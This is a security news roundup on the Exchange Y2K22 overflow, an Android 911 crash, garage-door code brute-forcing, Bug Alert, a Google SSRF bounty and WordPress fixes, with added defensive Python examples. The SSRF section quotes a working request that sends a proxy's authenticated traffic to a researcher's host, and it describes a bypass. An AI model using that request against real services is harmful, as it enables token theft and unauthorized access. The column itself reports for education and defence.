This Week In Security: Y2K22, Accidentally Blocking 911, And Bug Alert

Posted By bqwwu

If you had the misfortune of running a Microsoft Exchange server this past week, then you don’t need me to tell you about the Y2K22 problem. To catch the rest of us up: when Exchange tried to download the first malware definitions update of 2022, the version number of the new definitions triggered a crash in the malware detection engine. The version is represented as the string 2201010001, where the first two digits are the year. This string gets converted to a signed 32-bit integer (a long, on Windows), which maxes out at 2,147,483,647. The conversion overflows, the result is undefined behavior, and the engine crashes. The server fails safe: with no working malware engine it doesn’t process any messages, which means no email gets through. Happy New Year!

Android 911 Denial of Service

Dialing 911 for emergency services is pretty much the worst time for a software bug to manifest itself. Google just fixed such a bug in the January Android update. It’s one of those strange unintentional app interactions, in this case Microsoft Teams triggering the Android bug. If the Teams app is installed but no account is logged in, Teams creates and registers a new PhoneAccount object on every launch. That sounds like it should be rare, but Teams on Android is also notorious for logging the user out spontaneously. When you dial 911, Android runs a routine to determine which PhoneAccount should be used to route the call, and it resolves ties by comparing hashes. That comparison is just a naive subtraction of the two hash values, which can overflow and flip the sign, so roughly half the time it returns a result the sorting routine didn’t expect. That unexpected result is what led to the crash.
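Both stories above come down to the same thing: a value that does not fit in a signed 32-bit integer. The following is an added example, written for this column and not code from Microsoft, Google or the original article. It emulates Java/C-style 32-bit wrap-around in Python (`to_int32` is the assumption that makes that work), shows the 2201010001 version string turning negative and a field-wise parse that doesn’t, and then shows why a comparator written as `a - b` breaks the contract a sort routine relies on. The YY MM DD NNNN field layout in `version_checked` is assumed for the example; the column only confirms that the leading two digits are the year.

```python
import random

INT32_MIN, INT32_MAX = -2**31, 2**31 - 1


def to_int32(n):
    """Emulate storing an arbitrary integer in a two's-complement signed
    32-bit slot: keep the low 32 bits and reinterpret the sign bit.
    (Assumption for this example: this is how the wrap-around behaves.)"""
    n &= 0xFFFFFFFF
    return n - 2**32 if n & 0x80000000 else n


def version_unchecked(s):
    """The Exchange failure mode as described: the whole version string is
    converted to one signed 32-bit integer. 2201010001 exceeds INT32_MAX
    (2147483647), so the stored value wraps negative."""
    return to_int32(int(s))


def version_checked(s):
    """Parse the version as fields instead of one number. The YY MM DD NNNN
    layout is assumed for this example. Tuples compare in the right order
    and no field ever needs to fit in 32 bits."""
    if len(s) != 10 or not s.isdigit():
        raise ValueError(f"bad version string: {s!r}")
    yy, mm, dd, seq = int(s[0:2]), int(s[2:4]), int(s[4:6]), int(s[6:10])
    if not (1 <= mm <= 12 and 1 <= dd <= 31):
        raise ValueError(f"bad date in version string: {s!r}")
    return (yy, mm, dd, seq)


def subtraction_compare(a, b):
    """The Android bug class: a comparator written as a - b on two Java
    ints (two hash codes), with Java's wrap-around emulated via to_int32."""
    return to_int32(a - b)


def safe_compare(a, b):
    """A comparator that cannot overflow: only the ordering is computed."""
    return (a > b) - (a < b)


def sign(x):
    return (x > 0) - (x < 0)


def comparator_is_consistent(cmp, values):
    """Check the antisymmetry every comparator must satisfy:
    sign(cmp(a, b)) == -sign(cmp(b, a)) for all pairs. Java's sort
    throws when a comparator violates its general contract."""
    return all(sign(cmp(a, b)) == -sign(cmp(b, a))
               for a in values for b in values)


def random_hashes(n, seed=2022):
    """Constructed sample input: n values spread over the Java int range."""
    rng = random.Random(seed)
    return [rng.randint(INT32_MIN, INT32_MAX) for _ in range(n)]


if __name__ == "__main__":
    print("2112310001 ->", version_unchecked("2112310001"))  # fits
    print("2201010001 ->", version_unchecked("2201010001"))  # wraps negative
    print("fields     ->", version_checked("2201010001"))
    hashes = random_hashes(64)
    print("a - b comparator consistent:",
          comparator_is_consistent(subtraction_compare, hashes))
    print("safe comparator consistent: ",
          comparator_is_consistent(safe_compare, hashes))
```

The fix in both cases is the same shape: never let a parsed or derived value silently flow into a narrower type. Parse into something wide enough (or into fields) and range-check, and write comparators that return an ordering rather than a difference.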

Garage Door Reverse Engineering

Reverse engineering a 30-year-old wireless authorization scheme may not be the most attention-grabbing feat, but sometimes the journey is its own reward. [Maxwell Dulin] brings us the story, and this journey is definitely worth it. The basics of this hack are certainly still viable, starting with taking a look at the hardware. The garage door is synced to the opener by holding a pushbutton on the receiver while sending a code. Inside the opener there are nine DIP switches, each with three positions. What do they do? He pulled out his trusty SDR to capture the traffic and try to decode the signals. Inspectrum and GNU Radio were the heroes here, providing insight into this simple auth scheme. The final verdict on this particular garage door? Nine tri-state switches give only 3^9 = 19,683 possible codes, so you can brute force an unknown code by sending every possible combination, and it only takes 104 minutes.

Bug Alert

If you’re a sysadmin, you know that some issues call for immediate action. If you ran Java servers, the Log4j vulnerability was a fire drill for your response protocol. The time between public disclosure and when you first heard about it may have been enough to set off disaster. While there are several bug reporting services and frameworks, nothing quite fits this niche use case: notifying you as soon as possible that your hair may actually be on fire. That unfilled niche bugged [Matthew Sullivan], who has unveiled a new project, Bug Alert. It’s all open source, so you can host your own instance if you really want to. You can opt to receive a tweet, a text, or even a phone call. This has the potential to be a useful tool, check it out!

I feel like I need to make Bug Alert trigger a certain Weird Al song…

The Zombie SSRF

[David Schütz] was searching for obscure Google APIs, and found jobs.googleapis.com, which you can demo yourself. That demo is interesting, since it’s not a fully fleshed-out service, but it talks to the real back-end. The requests go through a proxy, cxl-services.appspot.com, which handles the authentication step for the demo page. If he could trigger a Server-Side Request Forgery (SSRF), he might be able to get at the authenticated requests, and perhaps trick the proxy into sending traffic on his behalf. URL parsing is hard. The trick that worked? A backslash in the URL:

GET /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ HTTP/1.1

With an access token in hand, [David] started carefully exploring other Google APIs to see what this token gave him access to. He gives the warning we’ve covered before: be careful how far you push. He could have reported the bug right away, but wanted to verify that he really had a live access token. After confirming the token worked for read access, he turned in the finding and netted a very nice $3133.70, plus an additional $1000 for a great report and the careful look at lateral movement. That’s all there is to it, right? Nope. Just before the 90-day disclosure deadline passed, [David] found a fix bypass. Adding any text between the backslash and the @ was enough to break it. Another $3133.70. Just for fun, he then probed the old URLs, which shouldn’t have been in service after the fix. Yep, he found yet another security token, and netted another $3133.70. This Zombie SSRF still isn’t dead, as evidenced on Twitter:
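The backslash trick works because two URL parsers can disagree about where the host ends, and an allowlist check that uses one parser while the HTTP client uses the other is a check against the wrong host. The following is an added example for this column, not code from Google or from [David]’s write-up, and it does not claim to reproduce the internals of cxl-services.appspot.com; it shows the bug class with Python’s urllib standing in for an RFC 3986-style parser and a backslash-to-slash rewrite standing in for WHATWG/browser-style parsing. The `ALLOWED_HOSTS` allowlist, the `naive_allowed` check and the `hardened_allowed` check are all assumptions constructed for the example. The attacker hostname and the bypass variant (text between the backslash and the @) are the ones the column describes.

```python
from urllib.parse import urlsplit

# Assumed allowlist for the proxy in this example; the real check is not public.
ALLOWED_HOSTS = {"jobs.googleapis.com"}


def rfc_view(url):
    """An RFC 3986-style parser's reading (urllib here): a backslash is an
    ordinary character, and the host is whatever follows the last '@' in
    the authority section. Returns (hostname, path)."""
    p = urlsplit(url)
    return p.hostname, p.path


def whatwg_view(url):
    """Approximation of the WHATWG/browser rule for http(s) URLs: a
    backslash is treated as a forward slash, so it ends the authority
    section early. Returns (hostname, path)."""
    scheme, sep, rest = url.partition("://")
    return rfc_view(scheme + sep + rest.replace("\\", "/"))


def naive_allowed(url):
    """The bug class: the host is validated with one parser, then the raw
    string is handed to an HTTP client that may split it differently."""
    return urlsplit(url).hostname in ALLOWED_HOSTS


def hardened_allowed(url):
    """Reject anything two parsers could disagree on, then require an exact
    host match. Returns the URL to fetch, or None to refuse."""
    if "\\" in url or "@" in url or any(c.isspace() for c in url):
        return None
    try:
        if rfc_view(url) != whatwg_view(url):
            return None
        p = urlsplit(url)
        if p.scheme != "https" or p.username is not None:
            return None
        if p.port not in (None, 443) or p.hostname not in ALLOWED_HOSTS:
            return None
    except ValueError:  # malformed authority / port
        return None
    return p.geturl()


if __name__ == "__main__":
    # Constructed sample URLs: a legitimate one, the original trick, the bypass.
    samples = [
        "https://jobs.googleapis.com/v4/jobs",
        "https://sfmnev.vps.xdavidhu.me\\@jobs.googleapis.com/",
        "https://sfmnev.vps.xdavidhu.me\\bypass@jobs.googleapis.com/",
    ]
    for url in samples:
        print(url)
        print("  rfc view   :", rfc_view(url))
        print("  whatwg view:", whatwg_view(url))
        print("  naive      :", naive_allowed(url))
        print("  hardened   :", hardened_allowed(url))
```

Stripping the single offending character is exactly the kind of fix that the reported bypass defeated; the durable version refuses any input whose interpretation depends on which parser reads it, and validates the URL the fetcher will actually use rather than the string the client sent.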

WordPress Update

If you haven’t set your WordPress instance to update automatically, it’s time to go check for the latest version. There are four potentially nasty issues here, though details are scarce at this point. First up is a Cross-Site Scripting vulnerability in post slugs, the part of the URL that matches the post name. The second issue mentioned is object injection in some multisite configurations. The last two vulnerabilities are SQL injections, certainly deserving of the “What Year is It?” meme.
